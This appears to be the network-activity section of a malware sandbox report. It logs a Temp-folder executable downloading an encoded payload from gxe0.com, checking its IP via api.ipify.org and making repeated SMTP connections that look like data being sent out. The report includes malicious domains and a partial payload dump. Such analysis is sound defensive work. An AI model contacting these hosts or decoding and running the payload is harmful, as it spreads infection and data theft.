Nov 11, 2024 18:02:56.535202980 CET	49718	443	192.168.2.8	104.26.12.205
Nov 11, 2024 18:02:56.545721054 CET	49718	443	192.168.2.8	104.26.12.205
Nov 11, 2024 18:02:56.545739889 CET	443	49718	104.26.12.205	192.168.2.8
Nov 11, 2024 18:02:56.546019077 CET	443	49718	104.26.12.205	192.168.2.8
Nov 11, 2024 18:02:56.620721102 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:56.620781898 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:56.704961061 CET	49718	443	192.168.2.8	104.26.12.205
Nov 11, 2024 18:02:56.740741968 CET	49718	443	192.168.2.8	104.26.12.205
Nov 11, 2024 18:02:56.787333012 CET	443	49718	104.26.12.205	192.168.2.8
Nov 11, 2024 18:02:56.842968941 CET	443	49718	104.26.12.205	192.168.2.8
Nov 11, 2024 18:02:56.843039036 CET	443	49718	104.26.12.205	192.168.2.8
Nov 11, 2024 18:02:56.843110085 CET	49718	443	192.168.2.8	104.26.12.205
Nov 11, 2024 18:02:56.847774982 CET	49718	443	192.168.2.8	104.26.12.205
Nov 11, 2024 18:02:57.332935095 CET	49714	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:58.444411993 CET	49719	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:58.449707031 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:58.449819088 CET	49719	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:58.946044922 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:58.947397947 CET	49719	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:58.953756094 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:59.114902020 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:59.115664005 CET	49719	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:59.120867968 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:59.284118891 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:59.284785032 CET	49719	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:59.290401936 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:59.458930969 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:59.459079981 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:59.459093094 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:59.459111929 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:59.459151983 CET	49719	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:59.459594011 CET	49719	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:59.460766077 CET	49719	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:59.466289043 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:59.629832029 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:59.639698982 CET	49719	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:59.645958900 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:59.852178097 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:02:59.853049040 CET	49719	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:02:59.857933998 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:00.020911932 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:00.021215916 CET	49719	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:00.026096106 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:00.196404934 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:00.231338024 CET	49719	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:00.236238956 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:00.398771048 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:00.403136969 CET	49719	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:00.408515930 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:00.576479912 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:00.582679987 CET	49719	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:00.587542057 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:00.750489950 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:00.751238108 CET	49719	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:00.751357079 CET	49719	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:00.751393080 CET	49719	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:00.751416922 CET	49719	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:00.756233931 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:00.756285906 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:00.756326914 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:00.756335974 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:01.070683956 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:01.119035006 CET	49719	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:01.124022961 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:01.286617041 CET	587	49719	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:01.287053108 CET	49719	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:01.288074970 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:01.292918921 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:01.292983055 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:01.937180042 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:01.937777996 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:01.942805052 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:02.105014086 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:02.106460094 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:02.111409903 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:02.274686098 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:02.275006056 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:02.280695915 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:02.454941988 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:02.454966068 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:02.454991102 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:02.455010891 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:02.455087900 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:02.455188990 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:02.461328030 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:02.466057062 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:02.629117012 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:02.630573034 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:02.635554075 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:02.798429966 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:02.800054073 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:02.805408955 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:02.968486071 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:03.005634069 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:03.011857033 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:03.179666996 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:03.193314075 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:03.198246002 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:03.360687017 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:03.361949921 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:03.366877079 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:03.533675909 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:03.536575079 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:03.541738987 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:03.704122066 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:03.704804897 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:03.704874039 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:03.704907894 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:03.704943895 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:03.704988956 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:03.705038071 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:03.705073118 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:03.705106020 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:03.705219984 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:03.705280066 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:03:03.709988117 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:03.709997892 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:03.710006952 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:03.710016012 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:03.710109949 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:03.710119963 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:03.881195068 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:03:03.921683073 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:04:35.795043945 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:04:35.797338963 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:04:35.800038099 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:04:35.802331924 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:04:35.963781118 CET	587	49720	51.195.88.199	192.168.2.8
Nov 11, 2024 18:04:35.964139938 CET	49720	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:04:35.964431047 CET	49724	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:04:35.964792967 CET	587	49717	51.195.88.199	192.168.2.8
Nov 11, 2024 18:04:35.965071917 CET	49717	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:04:35.965234041 CET	49725	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:04:35.969388962 CET	587	49724	51.195.88.199	192.168.2.8
Nov 11, 2024 18:04:35.969461918 CET	49724	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:04:35.971065044 CET	587	49725	51.195.88.199	192.168.2.8
Nov 11, 2024 18:04:35.971124887 CET	49725	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:04:36.553313017 CET	587	49724	51.195.88.199	192.168.2.8
Nov 11, 2024 18:04:36.553467035 CET	49724	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:04:36.555336952 CET	587	49725	51.195.88.199	192.168.2.8
Nov 11, 2024 18:04:36.555495977 CET	49725	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:04:36.558360100 CET	587	49724	51.195.88.199	192.168.2.8
Nov 11, 2024 18:04:36.560452938 CET	587	49725	51.195.88.199	192.168.2.8
Nov 11, 2024 18:04:36.720927000 CET	587	49724	51.195.88.199	192.168.2.8
Nov 11, 2024 18:04:36.721096039 CET	49724	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:04:36.723057985 CET	587	49725	51.195.88.199	192.168.2.8
Nov 11, 2024 18:04:36.723264933 CET	49725	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:04:36.726027012 CET	587	49724	51.195.88.199	192.168.2.8
Nov 11, 2024 18:04:36.728120089 CET	587	49725	51.195.88.199	192.168.2.8
Nov 11, 2024 18:04:36.888806105 CET	587	49724	51.195.88.199	192.168.2.8
Nov 11, 2024 18:04:36.891134024 CET	587	49725	51.195.88.199	192.168.2.8
Nov 11, 2024 18:04:36.937164068 CET	49725	587	192.168.2.8	51.195.88.199
Nov 11, 2024 18:04:36.937257051 CET	49724	587	192.168.2.8	51.195.88.199

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 11, 2024 18:02:27.066129923 CET	52684	53	192.168.2.8	1.1.1.1
Nov 11, 2024 18:02:27.092536926 CET	53	52684	1.1.1.1	192.168.2.8
Nov 11, 2024 18:02:38.673705101 CET	57095	53	192.168.2.8	1.1.1.1
Nov 11, 2024 18:02:38.680418015 CET	53	57095	1.1.1.1	192.168.2.8
Nov 11, 2024 18:02:40.167383909 CET	49350	53	192.168.2.8	1.1.1.1
Nov 11, 2024 18:02:40.176980019 CET	53	49350	1.1.1.1	192.168.2.8
Nov 11, 2024 18:02:46.848764896 CET	50479	53	192.168.2.8	1.1.1.1
Nov 11, 2024 18:02:46.856796980 CET	53	50479	1.1.1.1	192.168.2.8
Nov 11, 2024 18:02:55.250685930 CET	53696	53	192.168.2.8	1.1.1.1
Nov 11, 2024 18:02:55.258260012 CET	53	53696	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 11, 2024 18:02:27.066129923 CET	192.168.2.8	1.1.1.1	0xa013	Standard query (0)	gxe0.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:02:38.673705101 CET	192.168.2.8	1.1.1.1	0x70ab	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:02:40.167383909 CET	192.168.2.8	1.1.1.1	0x9614	Standard query (0)	s82.gocheapweb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:02:46.848764896 CET	192.168.2.8	1.1.1.1	0x3a95	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:02:55.250685930 CET	192.168.2.8	1.1.1.1	0x96af	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 11, 2024 18:02:27.092536926 CET	1.1.1.1	192.168.2.8	0xa013	No error (0)	gxe0.com	198.252.105.91	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:02:38.680418015 CET	1.1.1.1	192.168.2.8	0x70ab	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:02:38.680418015 CET	1.1.1.1	192.168.2.8	0x70ab	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:02:38.680418015 CET	1.1.1.1	192.168.2.8	0x70ab	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:02:40.176980019 CET	1.1.1.1	192.168.2.8	0x9614	No error (0)	s82.gocheapweb.com	51.195.88.199	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:02:46.856796980 CET	1.1.1.1	192.168.2.8	0x3a95	No error (0)	pywolwnvd.biz	54.244.188.177	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:02:55.258260012 CET	1.1.1.1	192.168.2.8	0x96af	No error (0)	pywolwnvd.biz	54.244.188.177	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

gxe0.com

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49706	198.252.105.91	443	4424	C:\Users\user\AppData\Local\Temp\x.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 17:02:28 UTC	161	OUT	GET /yak/233_Wisrysxlfss HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: gxe0.com
2024-11-11 17:02:28 UTC	365	IN	HTTP/1.1 200 OK Connection: close last-modified: Mon, 28 Oct 2024 23:14:08 GMT accept-ranges: bytes content-length: 2562520 date: Mon, 11 Nov 2024 17:02:28 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-11 17:02:28 UTC	1003	IN	Data Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 51 48 43 59 6b 48 42 41 6e 47 69 4d 6e 46 78 4d 56 4a 52 38 51 44 68 73 67 4a 53 49 67 48 78 49 58 44 68 55 61 49 42 59 61 4a 68 38 52 48 78 49 66 4a 68 77 5a 4a 43 49 6c 44 69 4d 6b 4a 79 4d 66 48 68 6b 61 4a 78 51 51 44 68 41 63 45 53 41 6e 4a 52 30 6c 49 52 51 50 46 69 41 51 4a 52 49 6e 4a 79 49 69 48 53 41 69 49 79 49 52 4a 52 59 63 4a 68 67 6d 48 51 38 52 46 78 49 63 48 42 63 6c 44 78 51 65 44 67 38 58 48 78 77 4f 49 69 45 65 48 52 4d 6a 4a 78 32 6d 72 71 56 5a 49 36 65 78 53 77 51 57 49 42 38 6d 49 43 55 5a 45 79 41 67 70 71 36 6c 57 53 4f 6e 73 55 75 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 Data Ascii: pq6lWSOnsUsQHCYkHBAnGiMnFxMVJR8QDhsgJSIgHxIXDhUaIBYaJh8RHxIfJhwZJCIlDiMkJyMfHhkaJxQQDhAcESAnJR0lIRQPFiAQJRInJyIiHSAiIyIRJRYcJhgmHQ8RFxIcHBclDxQeDg8XHxwOIiEeHRMjJx2mrqVZI6exSwQWIB8mICUZEyAgpq6lWSOnsUupnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbe
2024-11-11 17:02:28 UTC	14994	IN	Data Raw: 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 Data Ascii: muKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uq
2024-11-11 17:02:28 UTC	16384	IN	Data Raw: 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 Data Ascii: 7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mp
2024-11-11 17:02:28 UTC	16384	IN	Data Raw: 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 Data Ascii: qOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1
2024-11-11 17:02:28 UTC	16384	IN	Data Raw: 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 Data Ascii: rmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5
2024-11-11 17:02:28 UTC	16384	IN	Data Raw: 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 Data Ascii: Ke4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0
2024-11-11 17:02:28 UTC	16384	IN	Data Raw: 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a Data Ascii: KSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6Gz
